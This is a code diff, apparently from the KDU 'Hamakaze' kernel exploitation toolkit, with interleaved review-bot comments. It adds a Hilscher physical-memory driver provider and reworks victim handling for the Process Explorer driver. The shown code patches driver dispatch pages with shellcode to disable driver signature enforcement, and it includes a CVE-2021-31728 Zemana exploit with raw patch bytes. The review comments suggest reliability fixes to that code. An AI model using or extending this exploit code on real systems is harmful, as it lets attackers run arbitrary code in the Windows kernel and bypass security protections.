+ if (!VpQueryInformation(
+ Context->Victim, VictimImageInformation, &vi, sizeof(vi)))
+ {
+ supPrintfEvent(kduEventError,
+ "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError());
+
+ }
+ else {
- if (supEnumeratePhysicalMemory(KDUProcExpPagePatchCallback, &enumParams)) {
+ enumParams.DispatchHandlerOffset = vi.DispatchOffset;
+ enumParams.DispatchHandlerPageOffset = vi.DispatchPageOffset;
+ enumParams.JmpAddress = vi.JumpValue;
+ enumParams.DeviceHandle = Context->DeviceHandle;
+ enumParams.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
+ enumParams.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
- printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
- enumParams.ccPagesFound,
- enumParams.ccPagesModified);
+ enumParams.DispatchSignature = Context->Victim->Data.DispatchSignature;
+ enumParams.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
- //
- // Run shellcode.
- //
- VpExecutePayload(victimProv, &victimDeviceHandle);
+ enumParams.bWrite = TRUE;
+ enumParams.ccPagesFound = 0;
+ enumParams.ccPagesModified = 0;
+ enumParams.pvPayload = shellBuffer;
+ enumParams.cbPayload = (ULONG)shellSize;
supPrintfEvent(kduEventInformation,
- "[+] DSE patch executed successfully\r\n");
+ "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
+
+ if (supEnumeratePhysicalMemory(KDUPagePatchCallback, &enumParams)) {
+
+ printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
+ enumParams.ccPagesFound,
+ enumParams.ccPagesModified);
+
+ //
+ // Run shellcode.
+ //
+ VpExecutePayload(victimProv, &victimDeviceHandle);
+
+ supPrintfEvent(kduEventInformation,
+ "[+] DSE patch executed successfully\r\n");
+ }
+
}
//
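Review bot: The `if (supEnumeratePhysicalMemory(KDUPagePatchCallback, &enumParams))` block added here has no else branch, so an enumeration failure leaves KDUControlDSE2 silent, whereas the same construct in KDUpMapDriverPhysicalBruteForce in drvmap.cpp reports it; adding `else { supPrintfEvent(kduEventError, "[!] Failed to enumerate physical memory.\r\n"); }` keeps the two sites consistent. In the success branch the "[+] DSE patch executed successfully" message is printed whenever enumeration returns TRUE, including when `ccPagesModified` is 0 and nothing was written, so gating that message on `enumParams.ccPagesModified != 0` makes the log match what happened. `enumParams` is also not cleared before its members are assigned, unlike KDUMapDriver's `RtlSecureZeroMemory(&enumParams, sizeof(enumParams))`; if KDU_PHYSMEM_ENUM_PARAMS has members beyond those set here they stay indeterminate. KDUControlDSE2 begins and ends outside the hunk.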
diff --git a/Source/Hamakaze/idrv/asrdrv.cpp b/Source/Hamakaze/idrv/asrdrv.cpp
index 0750119..8c17a99 100644
--- a/Source/Hamakaze/idrv/asrdrv.cpp
+++ b/Source/Hamakaze/idrv/asrdrv.cpp
@@ -133,7 +133,7 @@ BOOL AsrEncryptDriverRequest(
if (hAlgAes != NULL)
BCryptCloseAlgorithmProvider(hAlgAes, 0);
- if (bResult && cbResult) {
+ if (bResult && cbResult && pbCipherData) {
ULONG outSize = sizeof(ASRDRV_REQUEST) +
cbResult +
diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
index eb88912..30f71ab 100644
--- a/Source/Hamakaze/idrv/dbk.cpp
+++ b/Source/Hamakaze/idrv/dbk.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: DBK.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Cheat Engine's DBK driver routines.
*
@@ -668,6 +668,9 @@ BOOL DbkMapDriver(
bSuccess = FALSE;
}
+ if (pvShellCode)
+ ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL));
+
FUNCTION_LEAVE_MSG(__FUNCTION__);
return bSuccess;
diff --git a/Source/Hamakaze/idrv/hilscher.cpp b/Source/Hamakaze/idrv/hilscher.cpp
new file mode 100644
index 0000000..461bdc3
--- /dev/null
+++ b/Source/Hamakaze/idrv/hilscher.cpp
@@ -0,0 +1,122 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: HILSCHER.CPP
+*
+* VERSION: 1.30
+*
+* DATE: 20 Mar 2023
+*
+* Hilscher physmem driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/hilscher.h"
+
+/*
+* PhmpReadWritePhysicalMemory
+*
+* Purpose:
+*
+* Read/Write from physical memory.
+*
+*/
+BOOL WINAPI PhmpReadWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes,
+ _In_ BOOL DoWrite)
+{
+ DWORD bytesIO = 0;
+ BOOL bResult;
+ NTSTATUS ntStatus;
+ PHYSMEM_MAP_IN request;
+
+ request.ullPhysicalAddress = PhysicalAddress;
+ request.ulMapSize = NumberOfBytes;
+
+ ntStatus = supCallDriverEx(DeviceHandle,
+ IOCTL_PHYSMEM_MAP,
+ &request,
+ sizeof(request),
+ &request,
+ sizeof(request),
+ NULL);
+
+ if (!NT_SUCCESS(ntStatus)) {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ return FALSE;
+ }
+
+ SetFilePointer(DeviceHandle, 0, NULL, FILE_BEGIN);
+
+ if (DoWrite)
+ bResult = WriteFile(DeviceHandle, Buffer, NumberOfBytes, &bytesIO, NULL);
+ else
+ bResult = ReadFile(DeviceHandle, Buffer, NumberOfBytes, &bytesIO, NULL);
+
+ return bResult;
+}
+
+/*
+* PhmReadPhysicalMemory
+*
+* Purpose:
+*
+* Read from physical memory.
+*
+*/
+BOOL WINAPI PhmReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ return PhmpReadWritePhysicalMemory(DeviceHandle, PhysicalAddress, Buffer, NumberOfBytes, FALSE);
+}
+
+/*
+* PhmWritePhysicalMemory
+*
+* Purpose:
+*
+* Write to physical memory.
+*
+*/
+BOOL WINAPI PhmWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ return PhmpReadWritePhysicalMemory(DeviceHandle, PhysicalAddress, Buffer, NumberOfBytes, TRUE);
+}
+
+/*
+* PhmRegisterDriver
+*
+* Purpose:
+*
+* Set physmem access type.
+*
+*/
+BOOL WINAPI PhmRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ UNREFERENCED_PARAMETER(Param);
+
+ PHYSMEM_ACCESS_IN request;
+
+ request.ulAccessType = PHYSMEM_READWRITE_ACCESS_8BIT;
+
+ return supCallDriver(DeviceHandle, IOCTL_PHYSMEM_SETACCESS, &request, sizeof(request), NULL, 0);
+}
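Review bot: PhmpReadWritePhysicalMemory returns the bare result of ReadFile/WriteFile and never looks at `bytesIO`, so a transfer that completes with fewer than NumberOfBytes bytes is reported as success to callers that then assume the whole buffer was moved; `return bResult && (bytesIO == NumberOfBytes);` makes the return value mean what the callers take it to mean. The `SetFilePointer(DeviceHandle, 0, NULL, FILE_BEGIN)` result is likewise unchecked; comparing it against INVALID_SET_FILE_POINTER (or switching to SetFilePointerEx) and returning FALSE early would close that gap. The header comment could also state the sequence the function relies on — the range is first registered through IOCTL_PHYSMEM_MAP, then the transfer goes through the device's file position rewound to zero — since that is not obvious from the name.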
diff --git a/Source/Hamakaze/idrv/hilscher.h b/Source/Hamakaze/idrv/hilscher.h
new file mode 100644
index 0000000..7e871d2
--- /dev/null
+++ b/Source/Hamakaze/idrv/hilscher.h
@@ -0,0 +1,68 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: HILSCHER.H
+*
+* VERSION: 1.30
+*
+* DATE: 20 Mar 2023
+*
+* HILSCHER physmem driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define PHYSMEM_READWRITE_ACCESS_8BIT 1 //byte
+#define PHYSMEM_READWRITE_ACCESS_16BIT 2 //word
+#define PHYSMEM_READWRITE_ACCESS_32BIT 3 //dword
+#define PHYSMEM_READWRITE_ACCESS_64BIT 4 //qword
+#define PHYSMEM_READWRITE_ACCESS_MEMCPY 5 //memcpy
+
+#define FILE_DEVICE_HILSCHER FILE_DEVICE_UNKNOWN
+
+#define PHYSMEM_MAP (DWORD)0x900
+#define PHYSMEM_SETACCESS (DWORD)0x901
+
+#define IOCTL_PHYSMEM_MAP \
+ CTL_CODE(FILE_DEVICE_HILSCHER, PHYSMEM_MAP,\
+ METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+
+#define IOCTL_PHYSMEM_SETACCESS \
+ CTL_CODE(FILE_DEVICE_HILSCHER, PHYSMEM_SETACCESS,\
+ METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+
+//
+// Hilscher HW driver interface.
+//
+
+typedef struct _PHYSMEM_ACCESS_IN {
+ ULONG ulAccessType;
+} PHYSMEM_ACCESS_IN, * PPHYSMEM_ACCESS_IN;
+
+typedef struct _PHYSMEM_MAP_IN {
+ ULONGLONG ullPhysicalAddress;
+ ULONG ulMapSize;
+} PHYSMEM_MAP_IN, * PPHYSMEM_MAP_IN;
+
+BOOL WINAPI PhmReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI PhmWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI PhmRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
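Review bot: `#define PHYSMEM_MAP (DWORD)0x900` and `#define PHYSMEM_SETACCESS (DWORD)0x901` expand to an unparenthesised cast, which is fragile inside a larger expression; `((DWORD)0x900)` and `((DWORD)0x901)` is the usual form. PHYSMEM_MAP_IN pairs a ULONGLONG with a ULONG under no packing pragma, so the `sizeof(request)` passed from hilscher.cpp is 16 with four trailing padding bytes; if the driver's input structure is the unpadded 12 bytes, confirm it accepts the larger length.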
diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp
index fbec003..ebee86a 100644
--- a/Source/Hamakaze/idrv/procexp.cpp
+++ b/Source/Hamakaze/idrv/procexp.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: PROCEXP.CPP
*
-* VERSION: 1.20
+* VERSION: 1.30
*
-* DATE: 08 Feb 2022
+* DATE: 20 Mar 2023
*
* Process Explorer driver routines.
*
@@ -24,13 +24,16 @@ HANDLE g_PexPhysicalMemorySection = NULL;
static KDU_VICTIM_PROVIDER g_ProcExpVictimSelf{
(LPCWSTR)PROCEXP152, // Device and driver name
- (LPCWSTR)PROCEXP_DESC, // Description
- IDR_PROCEXP, // Resource id in drivers database
- GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
+ (LPCWSTR)PROCEXP1627_DESC, // Description
+ IDR_PROCEXP1627, // Resource id in drivers database
+ KDU_VICTIM_PE1627, // Victim id
+ SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
KDU_VICTIM_FLAGS_NONE, // Victim flags, target dependent
VpCreateFromExistingCallback, // Victim create callback
VpReleaseCallbackStub, // Victim release callback
- VpExecuteFromExistingCallback // Victim execute payload callback
+ VpExecuteFromExistingCallback, // Victim execute payload callback
+ &g_ProcExpSig, // Victim dispatch bytes
+ sizeof(g_ProcExpSig) // Victim dispatch bytes size
};
/*
diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp
index d203ef6..608a4f6 100644
--- a/Source/Hamakaze/idrv/winring0.cpp
+++ b/Source/Hamakaze/idrv/winring0.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: WINRING0.CPP
*
-* VERSION: 1.27
+* VERSION: 1.30
*
-* DATE: 08 Nov 2022
+* DATE: 20 Mar 2023
*
* WinRing0 based drivers routines.
*
@@ -44,7 +44,7 @@ BOOL WRZeroReadPhysicalMemory(
return supCallDriver(DeviceHandle,
IOCTL_OLS_READ_MEMORY,
&request,
- sizeof(request),
+ sizeof(OLS_READ_MEMORY_INPUT),
Buffer,
NumberOfBytes);
}
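Review bot: Replacing `sizeof(request)` with `sizeof(OLS_READ_MEMORY_INPUT)` only changes anything if `request` is declared (outside the hunk) as something other than OLS_READ_MEMORY_INPUT, presumably a larger buffer; a one-line comment at the call stating that, such as `// request is larger than the input structure; pass only the input size`, will stop the next reader from reverting it to the `sizeof` of the object. WRZeroReadPhysicalMemory starts outside the hunk.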
diff --git a/Source/Hamakaze/idrv/zemana.cpp b/Source/Hamakaze/idrv/zemana.cpp
index ed9ae09..e36f0fe 100644
--- a/Source/Hamakaze/idrv/zemana.cpp
+++ b/Source/Hamakaze/idrv/zemana.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: ZEMANA.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Zemana driver routines.
*
@@ -52,7 +52,7 @@ typedef struct _ZM_SCSI_ACCESS {
} ZM_SCSI_ACCESS, * PZM_SCSI_ACCESS;
typedef struct _ZM_SCSI_MINIPORT_FIX {
- CHAR DriverName[260];
+ CHAR DriverName[MAX_PATH];
ULONG32 Offset_Func1;
UCHAR FixCode_Func1[128];
ULONG32 Offset_Func2;
@@ -268,20 +268,37 @@ BOOL ZmExploit_CVE2021_31728(
printf_s("[+] Stager shellCode allocated at 0x%llX\r\n", kernelShellCode);
+ CHAR szDriverName[MAX_PATH];
+
+ RtlSecureZeroMemory(&szDriverName, sizeof(szDriverName));
+
+
//
// Trigger shellcode.
//
- ZM_SCSI_MINIPORT_FIX MiniportFix = {
- "ZemanaAntimalware.sys",
- 0xD553, //driver specific offset, correct it for another sample
- {
- 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, imm64
- 0x80, 0x05, 0x01, 0x00, 0x00, 0x00, 0x10, // add byte ptr [rip+0], 0x10
- 0xFF, 0xC0, // inc eax -> call rax (after the self-modifying)
- 0xEB, 0x00 // jmp rel8
- }
+ ZM_SCSI_MINIPORT_FIX MiniportFix;
+ ANSI_STRING drvFileName;
+
+ RtlSecureZeroMemory(&MiniportFix, sizeof(MiniportFix));
+
+ drvFileName.Buffer = NULL;
+ drvFileName.Length = drvFileName.MaximumLength = 0;
+
+ ntsupConvertToAnsi(Context->Provider->LoadData->DriverName, &drvFileName);
+
+ StringCchPrintfA(MiniportFix.DriverName, MAX_PATH, "%s.sys", drvFileName.Buffer);
+
+ MiniportFix.Offset_Func1 = 0xD553; //driver specific offset, correct it for another sample
+
+ BYTE patchCode[] =
+ { 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, imm64
+ 0x80, 0x05, 0x01, 0x00, 0x00, 0x00, 0x10, // add byte ptr [rip+0], 0x10
+ 0xFF, 0xC0, // inc eax -> call rax (after the self-modifying)
+ 0xEB, 0x00 // jmp rel8
};
+ RtlCopyMemory(MiniportFix.FixCode_Func1, patchCode, sizeof(patchCode));
+
//
// Point the call to it.
//
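Review bot: The return of `ntsupConvertToAnsi(Context->Provider->LoadData->DriverName, &drvFileName)` is ignored, so on failure `drvFileName.Buffer` is still NULL when it reaches `StringCchPrintfA(MiniportFix.DriverName, MAX_PATH, "%s.sys", drvFileName.Buffer)`; check the result and bail out before the format call. Nothing in the hunk releases `drvFileName.Buffer` afterwards — if the conversion allocates the ANSI buffer, it needs freeing on both the success and the failure path. `szDriverName` is declared and zeroed at the top of the hunk but never used within it; if the rest of the function does not use it either, drop it. ZmExploit_CVE2021_31728 starts and ends outside the hunk.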
@@ -354,36 +371,50 @@ BOOL ZmMapDriver(
do {
if (VpCreate(victimProv,
Context->ModuleBase,
- &victimDeviceHandle))
+ &victimDeviceHandle,
+ NULL,
+ NULL))
{
- printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
+ printf_s("[+] Victim is loaded, handle 0x%p\r\n", victimDeviceHandle);
}
else {
supPrintfEvent(kduEventError,
- "[!] Could not accept victim target, GetLastError %lu\r\n", GetLastError());
+ "[!] Could not load victim target, GetLastError %lu\r\n", GetLastError());
}
- PRTL_PROCESS_MODULE_INFORMATION target;
- PRTL_PROCESS_MODULES modulesList = (PRTL_PROCESS_MODULES)supGetLoadedModulesList(FALSE, NULL);
- if (modulesList) {
+ VICTIM_DRIVER_INFORMATION vdi;
- target = (PRTL_PROCESS_MODULE_INFORMATION)ntsupFindModuleEntryByName(modulesList, "procexp152.sys");
- if (target) {
- dispatchAddress = (ULONG_PTR)target->ImageBase;
- }
+ RtlSecureZeroMemory(&vdi, sizeof(vdi));
- supHeapFree(modulesList);
+ if (!VpQueryInformation(Context->Victim, VictimDriverInformation, &vdi, sizeof(vdi))) {
+ supPrintfEvent(kduEventError,
+ "[!] Could not query victim driver information, GetLastError %lu\r\n", GetLastError());
+ break;
}
+ dispatchAddress = vdi.LoadedImageBase;
+
if (dispatchAddress == 0) {
supPrintfEvent(kduEventError,
"[!] Could not query victim target\r\n");
break;
}
+
+ VICTIM_IMAGE_INFORMATION vi;
+
+ RtlSecureZeroMemory(&vi, sizeof(vi));
+
+ if (!VpQueryInformation(
+ Context->Victim, VictimImageInformation, &vi, sizeof(vi)))
+ {
+ supPrintfEvent(kduEventError,
+ "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError());
+ break;
+ }
- dispatchAddress += PE152_DISPATCH_OFFSET;
+ dispatchAddress += vi.DispatchOffset;
printf_s("[+] Victim target 0x%llX\r\n", dispatchAddress);
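Review bot: When VpCreate fails, the else branch prints the "[!] Could not load victim target" message and then falls through into the new VpQueryInformation calls, which only make sense for a loaded victim; a `break;` after that `supPrintfEvent` would make the failure path explicit instead of relying on the later query to fail. The two query blocks (VictimDriverInformation, then VictimImageInformation) mirror the ones added to KDUMapDriver and KDUControlDSE2 in this commit, so a shared helper that fills both structures would avoid a third copy of the error handling. ZmMapDriver starts and ends outside the hunk.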
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index 8ed591f..2c79e6c 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: KDUPLIST.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 02 Dec 2022
+* DATE: 20 Mar 2023
*
* Providers global list.
*
@@ -39,6 +39,7 @@
#include "idrv/asrdrv.h"
#include "idrv/alcpu.h"
#include "idrv/ryzen.h"
+#include "idrv/hilscher.h"
//
// Victims public array.
@@ -46,14 +47,32 @@
static KDU_VICTIM_PROVIDER g_KDUVictims[] = {
{
(LPCWSTR)PROCEXP152, // Device and driver name,
- (LPCWSTR)PROCEXP_DESC, // Description
- IDR_PROCEXP, // Resource id in drivers database
- GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
+ (LPCWSTR)PROCEXP1627_DESC, // Description
+ IDR_PROCEXP1627, // Resource id in drivers database
+ KDU_VICTIM_PE1627, // Victim id
+ SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
KDU_VICTIM_FLAGS_SUPPORT_RELOAD, // Victim flags, target dependent
VpCreateCallback, // Victim create callback
VpReleaseCallback, // Victim release callback
- VpExecuteCallback // Victim execute payload callback
+ VpExecuteCallback, // Victim execute payload callback
+ & g_ProcExpSig, // Victim dispatch bytes
+ sizeof(g_ProcExpSig) // Victim dispatch bytes size
+ },
+
+ {
+ (LPCWSTR)PROCEXP152, // Device and driver name,
+ (LPCWSTR)PROCEXP1702_DESC, // Description
+ IDR_PROCEXP1702, // Resource id in drivers database
+ KDU_VICTIM_PE1702, // Victim id
+ SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
+ KDU_VICTIM_FLAGS_SUPPORT_RELOAD, // Victim flags, target dependent
+ VpCreateCallback, // Victim create callback
+ VpReleaseCallback, // Victim release callback
+ VpExecuteCallback, // Victim execute payload callback
+ & g_ProcExpSig, // Victim dispatch bytes
+ sizeof(g_ProcExpSig) // Victim dispatch bytes size
}
+
};
//
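Review bot: The new victim entries write the signature pointer as `& g_ProcExpSig` with a space, which reads like a binary operator and differs from the `&g_ProcExpSig` used for the same field in procexp.cpp in this commit; `&g_ProcExpSig,` in both entries keeps the table consistent. The blank line inserted before the closing `};` of g_KDUVictims also looks unintentional.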
@@ -743,7 +762,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provUnregisterDriver)NULL,
(provPreOpenDriver)NULL,
(provPostOpenDriver)KDUProviderPostOpen,
- (provMapDriver)KDUMapDriver2,
+ (provMapDriver)KDUMapDriver,
(provControlDSE)KDUControlDSE2,
(provReadKernelVM)NULL,
@@ -767,7 +786,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provUnregisterDriver)NULL,
(provPreOpenDriver)NULL,
(provPostOpenDriver)KDUProviderPostOpen,
- (provMapDriver)KDUMapDriver2,
+ (provMapDriver)KDUMapDriver,
(provControlDSE)KDUControlDSE2,
(provReadKernelVM)NULL,
@@ -791,7 +810,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provUnregisterDriver)NULL,
(provPreOpenDriver)NULL,
(provPostOpenDriver)KDUProviderPostOpen,
- (provMapDriver)KDUMapDriver2,
+ (provMapDriver)KDUMapDriver,
(provControlDSE)KDUControlDSE2,
(provReadKernelVM)NULL,
@@ -803,6 +822,30 @@ static KDU_PROVIDER g_KDUProviders[] =
(provWritePhysicalMemory)RmWritePhysicalMemory,
(provValidatePrerequisites)RmValidatePrerequisites
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)PhmRegisterDriver,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)KDUProviderPostOpen,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE2,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)PhmReadPhysicalMemory,
+ (provWritePhysicalMemory)PhmWritePhysicalMemory,
+
+ (provValidatePrerequisites)NULL
}
};
diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp
index 2a34784..cc2b926 100644
--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: KDUPROV.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Vulnerable drivers provider abstraction layer.
*
@@ -373,8 +373,8 @@ void KDUProvOpenVulnerableDriverAndRunCallbacks(
}
NTSTATUS ntStatus = supOpenDriver(Context->Provider->LoadData->DeviceName,
- WRITE_DAC | GENERIC_WRITE | GENERIC_READ,
- &deviceHandle);
+ SYNCHRONIZE | WRITE_DAC | GENERIC_WRITE | GENERIC_READ,
+ &deviceHandle);
if (!NT_SUCCESS(ntStatus)) {
@@ -512,7 +512,7 @@ BOOL WINAPI KDUProviderPostOpen(
deviceHandle,
NtCurrentProcess(),
&strHandle,
- GENERIC_WRITE | GENERIC_READ,
+ SYNCHRONIZE | GENERIC_WRITE | GENERIC_READ,
0,
0)))
{
@@ -679,6 +679,25 @@ HINSTANCE KDUProviderLoadDB(
return hInstance;
}
+BOOL KDUpRwHandlersAreSet(
+ _In_ PVOID ReadHandler,
+ _In_ PVOID WriteHandler
+)
+{
+ if (ReadHandler == NULL ||
+ WriteHandler == NULL)
+ {
+
+ supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
+ "\tKDU interface is not implemented for these methods.\r\n");
+
+ return FALSE;
+
+ }
+
+ return TRUE;
+}
+
/*
* KDUProviderVerifyActionType
*
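Review bot: The message printed by `KDUpRwHandlersAreSet` always says "arbitrary kernel read/write", but the helper is also used to validate the physical-memory handler pair (the `PreferPhysical` branch in a later hunk of this file), so a provider that lacks only `ReadPhysicalMemory`/`WritePhysicalMemory` is reported with the wrong reason. Consider giving the helper a short description argument of which pair was checked, or keeping the previous physical-memory wording for that caller. The function is also file-scope without `static` and has no `Purpose:` header like its neighbours; a line such as `* Return TRUE when both handlers are non-NULL, otherwise print an error event and return FALSE.` would match the file's convention.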
@@ -688,11 +707,11 @@ HINSTANCE KDUProviderLoadDB(
*
*/
BOOL KDUProviderVerifyActionType(
- _In_ KDU_PROVIDER * Provider,
+ _In_ KDU_PROVIDER* Provider,
_In_ KDU_ACTION_TYPE ActionType)
{
BOOL bResult = TRUE;
-
+
#ifdef _DEBUG
return TRUE;
#endif
@@ -713,15 +732,33 @@ BOOL KDUProviderVerifyActionType(
return FALSE;
}
- if (Provider->LoadData->PhysMemoryBruteForce &&
- (Provider->Callbacks.ReadPhysicalMemory == NULL ||
- Provider->Callbacks.WritePhysicalMemory == NULL))
- {
- supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support physical memory read/write or\r\n"\
- "\tKDU interface is not implemented for these methods.\r\n");
-
- return FALSE;
+ if (Provider->LoadData->PreferPhysical || Provider->LoadData->PhysMemoryBruteForce) {
+
+ //
+ // Driver must have at least something defined.
+ //
+ BOOL bFirstTry = TRUE, bSecondTry = TRUE;
+
+ if (Provider->Callbacks.ReadPhysicalMemory == NULL ||
+ Provider->Callbacks.WritePhysicalMemory == NULL)
+ {
+ bFirstTry = FALSE;
+ }
+
+ if (Provider->Callbacks.ReadKernelVM == NULL ||
+ Provider->Callbacks.WriteKernelVM == NULL)
+ {
+ bSecondTry = FALSE;
+ }
+
+ if (bFirstTry == NULL && bSecondTry == NULL) {
+ supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
+ "\tKDU interface is not implemented for these methods.\r\n");
+ return FALSE;
+ }
+
}
+
break;
default:
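Review bot: `bFirstTry == NULL && bSecondTry == NULL` compares two `BOOL` values with the null-pointer constant; it compiles because `NULL` is `0`, but it reads as a pointer test and a `nullptr`-based `NULL` would reject it. Write it as `if (!bFirstTry && !bSecondTry) {`. The two flags could also be plain boolean expressions, e.g. `BOOL bHavePhys = (Provider->Callbacks.ReadPhysicalMemory != NULL && Provider->Callbacks.WritePhysicalMemory != NULL);`, which removes the two `if` blocks whose only job is to clear them. The `case` label this block belongs to is above the hunk.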
@@ -735,16 +772,28 @@ BOOL KDUProviderVerifyActionType(
//
// Check if we can read/write.
//
- if (Provider->Callbacks.ReadKernelVM == NULL ||
- Provider->Callbacks.WriteKernelVM == NULL)
- {
- supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
- "\tKDU interface is not implemented for these methods.\r\n");
+ if (Provider->LoadData->PreferPhysical) {
- bResult = FALSE;
+ if (!KDUpRwHandlersAreSet(
+ (PVOID)Provider->Callbacks.ReadPhysicalMemory,
+ (PVOID)Provider->Callbacks.WritePhysicalMemory))
+ {
+ bResult = FALSE;
+ }
+
+ }
+ else {
+
+ if (!KDUpRwHandlersAreSet(
+ (PVOID)Provider->Callbacks.ReadKernelVM,
+ (PVOID)Provider->Callbacks.WriteKernelVM))
+ {
+ bResult = FALSE;
+ }
}
+
break;
case ActionTypeMapDriver:
